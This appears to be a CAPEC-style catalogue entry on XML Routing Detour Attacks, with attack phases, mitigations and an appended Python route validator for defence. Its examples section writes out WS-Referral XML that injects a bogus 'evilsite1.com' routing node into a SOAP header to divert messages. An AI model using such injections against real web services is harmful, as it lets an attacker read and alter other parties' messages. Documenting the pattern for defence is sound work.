An attacker subverts an intermediate system used to process XML content
and forces that intermediary to modify and/or re-route the processing of
the content. XML Routing Detour Attacks are man-in-the-middle attacks: the
attacker compromises or inserts an intermediate system in the processing
path of the XML message. For example, WS-Routing can be used to specify a
series of nodes or intermediaries through which content is passed. If any
of the intermediate nodes in this route is compromised by an attacker, it
can be used for a routing detour attack. From the compromised system the
attacker is able to route the XML message to other nodes of his or her
choice and modify the responses so that the normal chain of processing is
unaware of the interception. The compromised system can forward the message
to an outside entity and hide the forwarding and processing from the
legitimate processing systems by altering the header information.
Attack Execution Flow

Explore

Survey the target:
Using the command line or an automated tool, an attacker records all
instances of web services that process XML requests.

  Attack Step Techniques
  ID  Attack Step Technique Description                            Environments
  1   Use an automated tool to record all instances that process   env-Web, env-ClientServer
      XML requests, or find exposed WSDL.
  2   Use tools to crawl WSDL.                                     env-Web, env-ClientServer

  Indicators
  ID  Type          Indicator Description                          Environments
  1   Positive      The URL processes XML requests.                env-Web, env-ClientServer
  2   Inconclusive  The application does not accept XML requests.  env-Web, env-ClientServer
Experiment

Identify SOAP messages that have multiple-stage processing:
Inspect the instance to see whether the XML processing has multiple
stages or not.

  Attack Step Techniques
  ID  Attack Step Technique Description                            Environments
  1   Inspect the SOAP message routing header to see whether the   env-Web, env-ClientServer
      XML processing has multiple stages or not.

  Indicators
  ID  Type      Indicator Description                              Environments
  1   Positive  The SOAP message has multiple-stage processing.    env-Web, env-ClientServer
  2   Negative  The SOAP message does not have intermediate nodes. env-Web, env-ClientServer

  Outcomes
  ID  Type     Outcome Description
  1   Success  A list of URLs which have multiple stages to process XML contents.

  Security Controls
  ID  Type       Security Control Description
  1   Detective  Monitor the velocity of page fetching in web logs. Humans who
                 view a page and select a link from it will click far slower
                 and far less regularly than tools. Tools make requests very
                 quickly and the requests are typically spaced apart regularly
                 (e.g. 0.8 seconds between them).
Exploit

Launch an XML routing detour attack:
The attacker injects a bogus routing node (using a WS-Referral service)
into the routing table of the XML header of the SOAP message identified
in the Explore phase. Thus, the attacker can route the XML message to the
attacker-controlled node (and access the message contents).

  Attack Step Techniques
  ID  Attack Step Technique Description                            Environments
  1   The attacker injects a bogus routing node (using a           env-Web, env-ClientServer
      WS-Referral service) into the routing table of the XML
      header of the SOAP message.

  Outcomes
  ID  Type     Outcome Description
  1   Success  The XML message is routed to the attacker-controlled node.

  Security Controls
  ID  Type          Security Control Description
  1   Preventative  Use SSL for connections between all parties with mutual
                    authentication.
Attack Prerequisites
The targeted system must have multiple-stage processing of XML content.
Typical Likelihood of Exploit
Likelihood: High
Methods of Attack
Protocol Manipulation
Injection
Examples-Instances
Description
Here is an example SOAP call from a client, example1.com, to a target,
example4.com, via two intermediaries, example2.com and example3.com.
(Note: the client here is not necessarily an 'end user client' but
rather the starting point of the XML transaction.)

Example SOAP message with routing information in the header:

<S:Envelope>
  <S:Header>
    <m:path xmlns:m="http://schemas.example.com/rp/"
            S:actor="http://schemas.example.com/soap/actor"
            S:mustUnderstand="1">
      <m:action>http://example1.com/</m:action>
      <m:to>http://example4.com/router</m:to>
      <m:id>uuid:1235678-abcd-1a2b-3c4d-1a2b3c4d5e6f</m:id>
      <m:fwd>
        <m:via>http://example2.com/router</m:via>
      </m:fwd>
      <m:rev />
    </m:path>
  </S:Header>
  <S:Body>
    ...
  </S:Body>
</S:Envelope>

Add an additional node (example3.com/router) to the XML path in a
WS-Referral message:

<r:ref xmlns:r="http://schemas.example.com/referral">
  <r:for>
    <r:prefix>http://example2.com/router</r:prefix>
  </r:for>
  <r:if/>
  <r:go>
    <r:via>http://example3.com/router</r:via>
  </r:go>
</r:ref>

Resulting in the following SOAP header:

<S:Envelope>
  <S:Header>
    <m:path xmlns:m="http://schemas.example.com/rp/"
            S:actor="http://schemas.example.com/soap/actor"
            S:mustUnderstand="1">
      <m:action>http://example1.com/</m:action>
      <m:to>http://example4.com/router</m:to>
      <m:id>uuid:1235678-abcd-1a2b-3c4d-1a2b3c4d5e6f</m:id>
      <m:fwd>
        <m:via>http://example2.com/router</m:via>
        <m:via>http://example3.com/router</m:via>
      </m:fwd>
      <m:rev />
    </m:path>
  </S:Header>
  <S:Body>
    ...
  </S:Body>
</S:Envelope>

In the following example, the attacker injects a bogus routing node
(using a WS-Referral service) into the routing table of the XML header
but does not access the message directly on the initiator/intermediary
node that he/she has targeted. Example of WS-Referral based WS-Routing
injection of the bogus node route:

<r:ref xmlns:r="http://schemas.example.com/referral">
  <r:for>
    <r:prefix>http://example2.com/router</r:prefix>
  </r:for>
  <r:if/>
  <r:go>
    <r:via>http://evilsite1.com/router</r:via>
  </r:go>
</r:ref>

Resulting XML Routing Detour attack:

<S:Envelope>
  <S:Header>
    <m:path xmlns:m="http://schemas.example.com/rp/"
            S:actor="http://schemas.example.com/soap/actor"
            S:mustUnderstand="1">
      <m:action>http://example1.com/</m:action>
      <m:to>http://example4.com/router</m:to>
      <m:id>uuid:1235678-abcd-1a2b-3c4d-1a2b3c4d5e6f</m:id>
      <m:fwd>
        <m:via>http://example2.com/router</m:via>
        <m:via>http://evilsite1.com/router</m:via>
        <m:via>http://example3.com/router</m:via>
      </m:fwd>
      <m:rev />
    </m:path>
  </S:Header>
  <S:Body>
    ...
  </S:Body>
</S:Envelope>

Thus, the attacker can route the XML message to the attacker-controlled
node (and access the message contents).
Attacker Skills or Knowledge Required
Skill or Knowledge Level: Low
To inject a bogus node in the XML routing table
Resources Required
The attacker must be able to insert or compromise a system into the processing
path for the transaction.
Solutions and Mitigations
Design: Specify a maximum number of intermediate nodes for the request and
require SSL connections with mutual authentication.
Implementation: Use SSL for connections between all parties with mutual
authentication.
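As an added illustration (not part of this CAPEC entry), the design mitigation above can be enforced by a receiving node that validates the forward path of the example header before honouring it: routes with more hops than a configured maximum are refused, as is any <m:via> hop whose host is not an approved intermediary (the injected evilsite1.com node from the example). The routing namespace and hostnames are the page's; the SOAP 1.1 envelope namespace and the sample_envelope helper are assumptions.

```python
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

# The routing namespace is the one the page's example uses; the SOAP 1.1 envelope
# namespace is an assumption, since the page's snippets never declare xmlns:S.
SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"
RP_NS = "http://schemas.example.com/rp/"
NS = {"S": SOAP_NS, "m": RP_NS}


def forward_path(envelope_xml: str) -> list[str]:
    """Return the ordered <m:via> hops from the header's forward path."""
    root = ET.fromstring(envelope_xml)
    return [v.text.strip() for v in root.findall("S:Header/m:path/m:fwd/m:via", NS)]


def route_violations(envelope_xml: str, allowed_intermediaries: set[str],
                     max_intermediaries: int) -> list[str]:
    """Policy check a receiving node applies before honouring a routing path.
    Returns [] when the route is acceptable, otherwise one reason per violation:
    more hops than the configured maximum, or a hop whose host is not allowlisted."""
    vias = forward_path(envelope_xml)
    problems = []
    if len(vias) > max_intermediaries:
        problems.append(f"too many intermediaries: {len(vias)} > {max_intermediaries}")
    for via in vias:
        host = urlparse(via).hostname
        if host not in allowed_intermediaries:
            problems.append(f"intermediary not on allowlist: {host}")
    return problems


def sample_envelope(vias: list[str]) -> str:
    """Constructed (assumed) SOAP envelope mirroring the page's example header."""
    via_xml = "".join(f"<m:via>{v}</m:via>" for v in vias)
    return (
        f'<S:Envelope xmlns:S="{SOAP_NS}"><S:Header>'
        f'<m:path xmlns:m="{RP_NS}" S:actor="http://schemas.example.com/soap/actor" S:mustUnderstand="1">'
        '<m:action>http://example1.com/</m:action>'
        '<m:to>http://example4.com/router</m:to>'
        '<m:id>uuid:1235678-abcd-1a2b-3c4d-1a2b3c4d5e6f</m:id>'
        f'<m:fwd>{via_xml}</m:fwd><m:rev/></m:path>'
        '</S:Header><S:Body/></S:Envelope>'
    )


# Constructed inputs: the page's legitimate two-hop route and the detoured one.
LEGIT = sample_envelope(["http://example2.com/router", "http://example3.com/router"])
DETOURED = sample_envelope(["http://example2.com/router",
                            "http://evilsite1.com/router",
                            "http://example3.com/router"])
ALLOWED = {"example2.com", "example3.com"}
```

With ALLOWED and a maximum of 2 hops, route_violations(LEGIT, ALLOWED, 2) returns [] while the detoured message is flagged both for its third hop and for the unapproved host.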
Attack Motivation-Consequences
  Scope                                          Technical Impact                   Note
  Integrity                                      Modify application data
  Confidentiality                                Read application data
  Accountability, Authentication, Authorization, Gain privileges / assume identity
  Non-Repudiation
  Access_Control, Authorization                  Bypass protection mechanism
Injection Vector
The routing table of the XML Header
Payload
The bogus routing node in the routing table of XML header
Activation Zone
The route between the XML message sender and receiver.